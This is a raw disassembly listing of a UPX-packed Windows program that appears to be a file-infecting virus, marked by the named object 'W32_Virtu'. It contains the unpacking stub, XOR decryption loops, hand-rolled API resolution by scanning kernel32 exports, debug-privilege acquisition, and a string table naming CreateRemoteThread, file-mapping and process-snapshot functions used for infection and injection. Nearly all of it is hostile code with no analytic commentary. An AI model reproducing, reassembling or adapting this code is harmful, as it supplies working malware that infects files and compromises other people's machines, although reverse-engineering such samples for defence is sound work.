dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h
dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h
dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh
dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh
dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h
dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h
dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h
dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h
dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h
dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h
dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h
dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h
dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h
dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
dd 2FE409CFh, 230EFEFFh
dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh
dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h
dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh
dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h
dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h
dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h
dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch
dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h
dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h
dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h
dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh
dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h
dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh
dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h
dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah
dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah
dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh
dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh
dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh
dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h
dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h
dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h
dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h
dd 4D5C4552h, 62C1F869h, 6F736F7Bh, 5CBF5CD7h, 72727543h
dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h
dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh
dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h
dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h
dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh
dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h
dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h
dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h
dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh
dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch
dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h
dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h
dd 79706F43h, 70A40A19h, 45A1816Fh, 4E326578h, 7C52FFF6h
dd 6C6F6F54h, 32337067h, 70616E53h, 746F6873h, 4DADDD19h
dd 32129C8Ah, 540F7372h, 14AD7305h, 182C358Fh, 80FB05B6h
dd 78654E21h, 41616974h, 215FFD54h, 0F76451Eh, 7469616Bh
dd 53726F46h, 0B6F6BA21h, 4F7B673Ch, 2C766A62h, 0D9B9E144h
dd 8D225AC3h, 3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h
dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h
dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh
dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h
dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh
dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh
dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h
dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h
dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh
dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh
dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h
dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h
dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h
dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h
dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h
dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h
dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh
dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh
dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h
dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h
dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h
dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h
dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h
dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh
dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh
dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h
dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h
dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh
dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h
dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h
dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0)
db 90h
db 0FFh, 2 dup(0)
align 10h
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00010000 ( 65536.)
; Section size in file : 00010000 ( 65536.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dword_3142808C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA dd 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h
dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h
dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh
dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h
dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h
dd 1E00h
db 78h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call sub_314282A4
call sub_3142831D
mov ebp, fs:0
sub ebp, 0FFFFFFF8h
jmp loc_314282DD
; =============== S U B R O U T I N E =======================================
sub_314282A4 proc near ; CODE XREF: UPX2:3142828C�p
push dword ptr fs:0
mov fs:0, esp
xor edx, edx
push edx
push edx
push edx
push 80000000h
push 4
push edx
push edx
push 80000000h
push edx
push 80000000h
push 800h
push edx
push 80000000h
call ds:dword_3142808C ; LoadLibraryA
loc_314282DD: ; CODE XREF: UPX2:3142829F�j
call $+5
pop esi
sub esi, 0FFFFFFB8h
sub ecx, ecx
or ecx, 243Ch
sub ebx, ebx
or ebx, 0C5h
push esi
loc_314282FA: ; CODE XREF: sub_314282A4+64�j
mov al, [esi]
xor ax, bx
mov [esi], al
add esi, 1
dec ecx
cmp ecx, 0
ja short loc_314282FA
pop esi
mov esp, fs:0
pop dword ptr fs:0
leave
jmp esi
sub_314282A4 endp
; ---------------------------------------------------------------------------
db 3 dup(90h)
; =============== S U B R O U T I N E =======================================
sub_3142831D proc near ; CODE XREF: UPX2:31428291�p
arg_C = dword ptr 10h
mov ecx, [esp+arg_C]
xor eax, eax
pop dword ptr [ecx+0B8h]
retn
sub_3142831D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 90h
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_31428376
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_3142836D
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_31428375
; ---------------------------------------------------------------------------
loc_3142836D: ; CODE XREF: UPX2:3142835E�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_31428375: ; CODE XREF: UPX2:3142836B�j
pop ebx
loc_31428376: ; CODE XREF: UPX2:31428347�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 130h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_3142839D: ; CODE XREF: UPX2:314283B9�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_314283B3
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_314283BB
loc_314283B3: ; CODE XREF: UPX2:314283A4�j
sub ebx, 100h
jnz short loc_3142839D
loc_314283BB: ; CODE XREF: UPX2:314283B1�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_314283C9: ; CODE XREF: UPX2:loc_314283F0�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_314283F0
cmp dword ptr [eax+3], 636F7250h
jnz short loc_314283F0
cmp dword ptr [eax+7], 72646441h
jnz short loc_314283F0
cmp dword ptr [eax+0Bh], 737365h
jz short loc_314283F5
loc_314283F0: ; CODE XREF: UPX2:314283D3�j
; UPX2:314283DC�j ...
loop loc_314283C9
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_314283F5: ; CODE XREF: UPX2:314283EE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_3142841B+2
inc ebx
insb
outsd
jnb short near ptr loc_31428479+2
dec eax
popa
outsb
db 64h
insb
loc_3142841B: ; CODE XREF: UPX2:3142840C�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_31428437+1
inc ebx
jb short near ptr loc_31428492+1
popa
jz short near ptr loc_31428492+4
inc ebp
jbe short near ptr loc_31428498+1
outsb
jz short near ptr loc_31428476+2
loc_31428437: ; CODE XREF: UPX2:31428426�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_31428453
inc edi
db 65h
jz short near ptr loc_31428492+4
popa
jnb short loc_314284C1
inc ebp
jb short near ptr loc_314284C1+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_31428453 proc near ; CODE XREF: UPX2:31428441�p
; FUNCTION CHUNK AT 314284FC SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 3142863C SIZE 0000013A BYTES
push ebx
call esi ; lstrcatA
mov [ebp+403544h], eax
call sub_314284D1
test eax, eax
jz short loc_31428486
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_31428480
lea eax, [ebp+4011D2h]
loc_31428476: ; CODE XREF: UPX2:31428435�j
mov dl, [eax-1]
loc_31428479: ; CODE XREF: UPX2:31428414�j
call sub_314284EC
jmp short loc_314284FC
; ---------------------------------------------------------------------------
loc_31428480: ; CODE XREF: sub_31428453+1B�j
; sub_31428453+136�j ...
call dword ptr [ebp+40353Ch]
loc_31428486: ; CODE XREF: sub_31428453+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_314284B0
loc_31428492: ; CODE XREF: UPX2:3142842C�j
; UPX2:3142842F�j ...
lea esi, [ebp+403435h]
loc_31428498: ; CODE XREF: UPX2:31428432�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_314284B0: ; CODE XREF: sub_31428453+3D�j
pop ebp
retn
sub_31428453 endp
; ---------------------------------------------------------------------------
loc_314284B2: ; CODE XREF: sub_314284D1+2�p
; sub_31428453:loc_314286BB�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_314284C1: ; CODE XREF: UPX2:3142844B�j
; UPX2:3142844E�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_314284D1 proc near ; CODE XREF: sub_31428453+9�p
xor ecx, ecx
call loc_314284B2
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_314284D1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_314284EC proc near ; CODE XREF: sub_31428453:loc_31428479�p
; sub_3142A2C0+25B�p
mov dh, dl
mov ecx, 225Fh
loc_314284F3: ; CODE XREF: sub_314284EC+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_314284F3
retn
sub_314284EC endp
; ---------------------------------------------------------------------------
xchg eax, esp
; START OF FUNCTION CHUNK FOR sub_31428453
loc_314284FC: ; CODE XREF: sub_31428453+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_31428523: ; CODE XREF: sub_31428453+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_31428523
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_314288B6
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_3142863C
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_31428480
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_31428453
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_31428480
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_31428480
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_3142862C
jmp loc_31428480
; =============== S U B R O U T I N E =======================================
sub_3142862C proc near ; CODE XREF: UPX2:31428622�p
; sub_3142862C+D�j
push 1
pop ecx
jecxz short locret_3142863B
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_3142862C
; ---------------------------------------------------------------------------
locret_3142863B: ; CODE XREF: sub_3142862C+3�j
retn
sub_3142862C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31428453
loc_3142863C: ; CODE XREF: sub_31428453+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_31428480
call near ptr loc_31428653+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_31428653: ; CODE XREF: sub_31428453+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_31428670+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_314288B6
loc_31428670: ; CODE XREF: sub_31428453+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_31428480
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_314286BB
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_314286BB: ; CODE XREF: sub_31428453+25D�j
call loc_314284B2
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_31428700: ; CODE XREF: sub_31428453+2B0�j
lodsb
stosw
loop loc_31428700
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_31428480
lea esi, [ebp+401000h]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_31428453
; ---------------------------------------------------------------------------
dw 958Dh
dd 4018E0h, 9C95FF52h, 0E8004035h, 16h
aLookupprivil_0 db 'LookupPrivilegeValueA',0
dw 0FF50h
dd 40354895h, 4C858900h, 50004035h, 6A206A54h, 0EC95FFFFh
dd 85004035h, 3F755FC0h, 56026A96h, 6AD48B56h, 11E85201h
dd 53000000h, 62654465h, 72506775h, 6C697669h, 656765h
dd 4C95FF56h, 8B004035h, 565656C4h, 0FF575650h, 4035D095h
dd 10C48300h, 3C95FF57h, 6A004035h, 0FF026A00h, 40357095h
dd 128B900h, 2B970000h, 240C89E1h, 95FF5754h, 4035ACh
dd 0A583F633h, 40363Ch, 0FF575400h, 4035B095h, 74C08500h
dd 0FE83465Ch, 0FFEE7204h, 6A082474h, 0FF2A6A00h, 4035A895h
dd 74C08500h, 3DE893DCh, 33000004h, 30E391C9h, 363C8539h
dd 28750040h, 0DAEC181h, 54500000h, 50515650h, 95FF5350h
dd 403568h, 7459C085h, 2474FF0Fh, 3C858F08h, 0E8004036h
dd 0FFFFFDACh, 3C95FF53h, 0EB004035h, 28C48198h, 57000001h
dd 353C95FFh, 0E5E90040h, 8DFFFFFBh, 58580049h, 29CE0058h
dd 0D650000h, 3 dup(0)
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_314288B6 proc near ; CODE XREF: sub_31428453+100�p
; sub_31428453+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_314288C1: ; CODE XREF: sub_314288B6+E�j
lodsb
test al, al
jnz short loc_314288C1
loop sub_314288B6
retn
sub_314288B6 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
